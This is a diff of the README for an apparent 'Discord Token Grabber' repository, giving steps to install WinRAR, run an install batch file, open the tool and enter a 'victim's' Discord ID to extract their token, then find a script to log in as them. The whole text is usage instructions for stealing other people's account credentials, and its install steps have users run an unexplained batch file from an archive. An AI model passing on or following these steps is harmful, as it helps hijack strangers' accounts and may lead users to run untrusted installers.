SquidWardpepe09/Discord-Token-Grabber/README.md

 Steps in order to download Discord Token Grabber - Made by Wya?

+REQUIRED, Install https://www.win-rar.com/start.html?&L=0 if you don't do this, you cannot use Discord-Token-Grabber.
+This is a rar file and winrar is the only way to open it.

 Step one, download the files.

 Step two, extract the folder.

 Step three, run the install Bat.

-Step four, open Discord Token Grabber.

 Let the install run, until it is done.
 Once done a list of files should pop up.

+Step four, open Discord-Token-Grabber.rar.

-Run Discord Token Grabber.exe and enter your victims Discord ID.
+Run Discord Token Grabber.rar and enter your victims Discord ID.

+Once you have your victims Disocrd ID, put it into the box that says "Victim ID Here" and click extract Discord Token.

+Boom, you have your victims token.
+Now find a script that allows you to login.

 ------------------------
       TOS BELOW!